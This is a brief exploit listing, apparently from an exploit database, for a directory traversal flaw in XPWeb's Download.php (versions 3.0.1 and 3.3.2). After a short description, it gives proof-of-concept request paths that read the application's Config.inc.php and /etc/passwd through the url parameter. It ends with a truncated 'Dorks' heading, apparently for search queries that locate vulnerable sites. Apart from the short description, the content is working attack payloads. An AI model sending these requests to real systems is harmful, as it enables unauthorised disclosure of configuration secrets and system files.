Directory traversal

Directory traversal vulnerability in Download.php in XPWeb 3.0.1, 3.3.2, and possibly other versions, allows remote attackers to read arbitrary files via a .. dot dot in the url parameter...

XPWeb 3.3.2 - url Remote File Disclosure

XPWeb 3.3.2 - url Remote File Disclosure XPWeb 3.3.2 Download.php url Remote File Disclosure Vulnerability http://puzzle.dl.sourceforge.net/sourceforge/xpweb/XPWebv3.3.2.tgz POC : /XPWebv3.3.2/Download.php?url=Config.inc.php /XPWebv3.3.2/Download.php?url=../../../../../../../etc/passwd Dorks :...